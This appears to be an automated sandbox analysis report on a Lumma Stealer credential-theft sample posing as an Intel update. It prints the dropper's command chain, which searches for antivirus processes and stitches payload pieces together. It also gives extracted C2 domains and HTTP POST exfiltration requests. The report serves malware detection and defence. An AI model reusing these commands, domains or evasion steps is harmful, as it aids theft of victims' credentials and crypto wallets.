Edit tour

Windows Analysis Report
[UPD]Intel_Unit.2.1.exe

Overview

General Information

Sample name:	[UPD]Intel_Unit.2.1.exe
Analysis ID:	1585387
MD5:	25b4bac0866214df0bcb32a8dc280555
SHA1:	58513411b725c0f264013acacaba7fe069208aa7
SHA256:	17e8ebdf1c3303f6c9538e9998e533962aa732a1356434d6cf78ab353f3a9f06
Tags:	exeLummaStealeruser-aachum
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Sigma detected: Search for Antivirus process

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Drops PE files with a suspicious file extension

Found API chain indicative of sandbox detection

Found many strings related to Crypto-Wallets (likely being stolen)

LummaC encrypted strings found

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to resolve many domain names, but no domain seems valid

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality for read data from the clipboard

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected non-DNS traffic on DNS port

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

PE / OLE file has an invalid certificate

PE file contains an invalid checksum

Potential key logger detected (key state polling based)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Searches for user specific document files

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

[UPD]Intel_Unit.2.1.exe (PID: 4196 cmdline: "C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exe" MD5: 25B4BAC0866214DF0BCB32A8DC280555)

cmd.exe (PID: 5128 cmdline: "C:\Windows\System32\cmd.exe" /c move Cloudy Cloudy.cmd & Cloudy.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 5732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 5588 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 5608 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

tasklist.exe (PID: 6704 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 2448 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 6636 cmdline: cmd /c md 686536 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

extrac32.exe (PID: 5672 cmdline: extrac32 /Y /E Justify MD5: 9472AAB6390E4F1431BAA912FCFF9707)

findstr.exe (PID: 2328 cmdline: findstr /V "Backing" Kelly MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 3544 cmdline: cmd /c copy /b 686536\Hugo.com + Ware + Sanyo + Pg + Folk + Lifetime + Robert + Enlarge + Hence 686536\Hugo.com MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

cmd.exe (PID: 6840 cmdline: cmd /c copy /b ..\Selection + ..\Suse + ..\Illustrations + ..\Alerts + ..\Smart + ..\Steps + ..\Lovers y MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

Hugo.com (PID: 6596 cmdline: Hugo.com y MD5: 62D09F076E6E0240548C2F837536A46A)

choice.exe (PID: 5264 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["noisycuttej.shop", "abruptyopsn.shop", "framekgirus.shop", "wholersorie.shop", "cloudewahsj.shop", "tirepublicerj.shop", "rabidcowse.shop", "lastlossunbag.click", "nearycrepso.shop"], "Build id": "HpOoIh--@MrSalt"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
0000000D.00000003.2716593365.0000000001B41000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000D.00000003.2717609537.0000000001B41000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Hugo.com PID: 6596	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: Hugo.com PID: 6596	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Hugo.com PID: 6596	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 1 entries

Sigma Signatures

HIPS / PFW / Operating System Protection Evasion

Sigma detected: Search for Antivirus process

Source: Process started

Author: Joe Security: Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c move Cloudy Cloudy.cmd & Cloudy.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5128, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 2448, ProcessName: findstr.exe

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-07T15:45:55.742966+0100	2028371	3	Unknown Traffic	192.168.2.6	50736	104.102.49.254	443	TCP
2025-01-07T15:45:56.841787+0100	2028371	3	Unknown Traffic	192.168.2.6	50737	104.21.64.1	443	TCP
2025-01-07T15:45:57.643942+0100	2028371	3	Unknown Traffic	192.168.2.6	50738	104.21.64.1	443	TCP
2025-01-07T15:45:58.807522+0100	2028371	3	Unknown Traffic	192.168.2.6	50739	104.21.64.1	443	TCP
2025-01-07T15:45:59.958646+0100	2028371	3	Unknown Traffic	192.168.2.6	50740	104.21.64.1	443	TCP
2025-01-07T15:46:01.049260+0100	2028371	3	Unknown Traffic	192.168.2.6	50741	104.21.64.1	443	TCP
2025-01-07T15:46:02.386841+0100	2028371	3	Unknown Traffic	192.168.2.6	50742	104.21.64.1	443	TCP
2025-01-07T15:46:03.635728+0100	2028371	3	Unknown Traffic	192.168.2.6	50743	104.21.64.1	443	TCP
2025-01-07T15:46:04.797695+0100	2028371	3	Unknown Traffic	192.168.2.6	50744	104.21.64.1	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-07T15:45:57.172707+0100	2054653	1	A Network Trojan was detected	192.168.2.6	50737	104.21.64.1	443	TCP
2025-01-07T15:45:58.137343+0100	2054653	1	A Network Trojan was detected	192.168.2.6	50738	104.21.64.1	443	TCP
2025-01-07T15:46:05.278650+0100	2054653	1	A Network Trojan was detected	192.168.2.6	50744	104.21.64.1	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-07T15:45:57.172707+0100	2049836	1	A Network Trojan was detected	192.168.2.6	50737	104.21.64.1	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-07T15:45:58.137343+0100	2049812	1	A Network Trojan was detected	192.168.2.6	50738	104.21.64.1	443	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (abruptyopsn .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-07T15:45:54.902008+0100	2058598	1	Domain Observed Used for C2 Detected	192.168.2.6	61213	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (cloudewahsj .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-07T15:45:54.988060+0100	2058606	1	Domain Observed Used for C2 Detected	192.168.2.6	50699	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (framekgirus .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-07T15:45:54.929024+0100	2058610	1	Domain Observed Used for C2 Detected	192.168.2.6	61304	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (nearycrepso .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-07T15:45:54.878018+0100	2058616	1	Domain Observed Used for C2 Detected	192.168.2.6	59238	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (noisycuttej .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-07T15:45:54.953023+0100	2058618	1	Domain Observed Used for C2 Detected	192.168.2.6	63595	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rabidcowse .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-07T15:45:54.972074+0100	2058622	1	Domain Observed Used for C2 Detected	192.168.2.6	60313	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tirepublicerj .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-07T15:45:54.941156+0100	2058628	1	Domain Observed Used for C2 Detected	192.168.2.6	51625	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wholersorie .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-07T15:45:54.914008+0100	2058632	1	Domain Observed Used for C2 Detected	192.168.2.6	52558	1.1.1.1	53	UDP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-07T15:46:02.735849+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.6	50742	104.21.64.1	443	TCP

ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-07T15:45:56.253659+0100	2858666	1	Domain Observed Used for C2 Detected	192.168.2.6	50736	104.102.49.254	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: noisycuttej.shop	URL Reputation: Label: malware
Source: framekgirus.shop	URL Reputation: Label: malware
Source: rabidcowse.shop	URL Reputation: Label: malware
Source: wholersorie.shop	URL Reputation: Label: malware
Source: tirepublicerj.shop	URL Reputation: Label: malware
Source: https://sputnik-1985.com/i~	Avira URL Cloud: Label: malware
Source: https://sputnik-1985.com/api	Avira URL Cloud: Label: malware
Source: https://sputnik-1985.com/LOX	Avira URL Cloud: Label: malware
Source: https://sputnik-1985.com/r	Avira URL Cloud: Label: malware
Source: https://sputnik-1985.com:443/apial	Avira URL Cloud: Label: malware
Source: https://sputnik-1985.com/Site	Avira URL Cloud: Label: malware
Source: https://sputnik-1985.com/t	Avira URL Cloud: Label: malware
Source: lastlossunbag.click	Avira URL Cloud: Label: malware
Source: https://sputnik-1985.com/api0	Avira URL Cloud: Label: malware
Source: https://sputnik-1985.com/apila	Avira URL Cloud: Label: malware
Source: https://sputnik-1985.com/apij	Avira URL Cloud: Label: malware
Source: https://sputnik-1985.com/apijhhCf	Avira URL Cloud: Label: malware
Source: https://lastlossunbag.click/api	Avira URL Cloud: Label: malware
Source: https://sputnik-1985.com/	Avira URL Cloud: Label: malware
Source: https://sputnik-1985.com/a	Avira URL Cloud: Label: malware

Found malware configuration

Source: 0000000D.00000003.2652978700.00000000048F2000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: LummaC {"C2 url": ["noisycuttej.shop", "abruptyopsn.shop", "framekgirus.shop", "wholersorie.shop", "cloudewahsj.shop", "tirepublicerj.shop", "rabidcowse.shop", "lastlossunbag.click", "nearycrepso.shop"], "Build id": "HpOoIh--@MrSalt"}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 94.6% probability

Sample uses string decryption to hide its real strings

Source: 0000000D.00000002.2765946345.00000000048E9000.00000004.00000800.00020000.00000000.sdmp	String decryptor: cloudewahsj.shop
Source: 0000000D.00000002.2765946345.00000000048E9000.00000004.00000800.00020000.00000000.sdmp	String decryptor: rabidcowse.shop
Source: 0000000D.00000002.2765946345.00000000048E9000.00000004.00000800.00020000.00000000.sdmp	String decryptor: noisycuttej.shop
Source: 0000000D.00000002.2765946345.00000000048E9000.00000004.00000800.00020000.00000000.sdmp	String decryptor: tirepublicerj.shop
Source: 0000000D.00000002.2765946345.00000000048E9000.00000004.00000800.00020000.00000000.sdmp	String decryptor: framekgirus.shop
Source: 0000000D.00000002.2765946345.00000000048E9000.00000004.00000800.00020000.00000000.sdmp	String decryptor: wholersorie.shop
Source: 0000000D.00000002.2765946345.00000000048E9000.00000004.00000800.00020000.00000000.sdmp	String decryptor: abruptyopsn.shop
Source: 0000000D.00000002.2765946345.00000000048E9000.00000004.00000800.00020000.00000000.sdmp	String decryptor: nearycrepso.shop
Source: 0000000D.00000002.2765946345.00000000048E9000.00000004.00000800.00020000.00000000.sdmp	String decryptor: lastlossunbag.click
Source: 0000000D.00000002.2765946345.00000000048E9000.00000004.00000800.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 0000000D.00000002.2765946345.00000000048E9000.00000004.00000800.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 0000000D.00000002.2765946345.00000000048E9000.00000004.00000800.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 0000000D.00000002.2765946345.00000000048E9000.00000004.00000800.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 0000000D.00000002.2765946345.00000000048E9000.00000004.00000800.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 0000000D.00000002.2765946345.00000000048E9000.00000004.00000800.00020000.00000000.sdmp	String decryptor: HpOoIh--@MrSalt

Source: [UPD]Intel_Unit.2.1.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.6:50736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.6:50737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.6:50738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.6:50739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.6:50740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.6:50741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.6:50742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.6:50743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.6:50744 version: TLS 1.2

Source: [UPD]Intel_Unit.2.1.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exe	Code function: 0_2_004062D5 FindFirstFileW,FindClose,	0_2_004062D5
Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exe	Code function: 0_2_00402E18 FindFirstFileW,	0_2_00402E18
Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exe	Code function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	0_2_00406C9B
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Code function: 13_2_00F7DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	13_2_00F7DC54
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Code function: 13_2_00F8A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	13_2_00F8A087
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Code function: 13_2_00F8A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	13_2_00F8A1E2
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Code function: 13_2_00F7E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	13_2_00F7E472
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Code function: 13_2_00F8A570 FindFirstFileW,Sleep,FindNextFileW,FindClose,	13_2_00F8A570
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Code function: 13_2_00F866DC FindFirstFileW,FindNextFileW,FindClose,	13_2_00F866DC
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Code function: 13_2_00F4C622 FindFirstFileExW,	13_2_00F4C622
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Code function: 13_2_00F873D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	13_2_00F873D4
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Code function: 13_2_00F87333 FindFirstFileW,FindClose,	13_2_00F87333
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Code function: 13_2_00F7D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	13_2_00F7D921

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Microsoft\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Windows\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2058616 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (nearycrepso .shop) : 192.168.2.6:59238 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058598 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (abruptyopsn .shop) : 192.168.2.6:61213 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058622 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rabidcowse .shop) : 192.168.2.6:60313 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058628 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tirepublicerj .shop) : 192.168.2.6:51625 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058632 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wholersorie .shop) : 192.168.2.6:52558 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058610 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (framekgirus .shop) : 192.168.2.6:61304 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058618 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (noisycuttej .shop) : 192.168.2.6:63595 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058606 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (cloudewahsj .shop) : 192.168.2.6:50699 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:50742 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:50737 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50737 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50744 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.6:50736 -> 104.102.49.254:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:50738 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50738 -> 104.21.64.1:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: noisycuttej.shop
Source: Malware configuration extractor	URLs: abruptyopsn.shop
Source: Malware configuration extractor	URLs: framekgirus.shop
Source: Malware configuration extractor	URLs: wholersorie.shop
Source: Malware configuration extractor	URLs: cloudewahsj.shop
Source: Malware configuration extractor	URLs: tirepublicerj.shop
Source: Malware configuration extractor	URLs: rabidcowse.shop
Source: Malware configuration extractor	URLs: lastlossunbag.click
Source: Malware configuration extractor	URLs: nearycrepso.shop

Tries to resolve many domain names, but no domain seems valid

Source: unknown	DNS traffic detected: query: nearycrepso.shop replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: rabidcowse.shop replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: tirepublicerj.shop replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: cloudewahsj.shop replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lastlossunbag.click replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: wholersorie.shop replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: framekgirus.shop replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: noisycuttej.shop replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: abruptyopsn.shop replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: EDfttWxgFMWaHfidSCzybfKyg.EDfttWxgFMWaHfidSCzybfKyg replaycode: Name error (3)

Source: global traffic

TCP traffic: 192.168.2.6:50731 -> 162.159.36.2:53

Source: Joe Sandbox View	IP Address: 104.102.49.254 104.102.49.254
Source: Joe Sandbox View	IP Address: 104.21.64.1 104.21.64.1

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50739 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50741 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50742 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50744 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50740 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50737 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50738 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50736 -> 104.102.49.254:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50743 -> 104.21.64.1:443

Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sputnik-1985.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 81Host: sputnik-1985.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=6H7HXKT5W9NQTUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12831Host: sputnik-1985.com
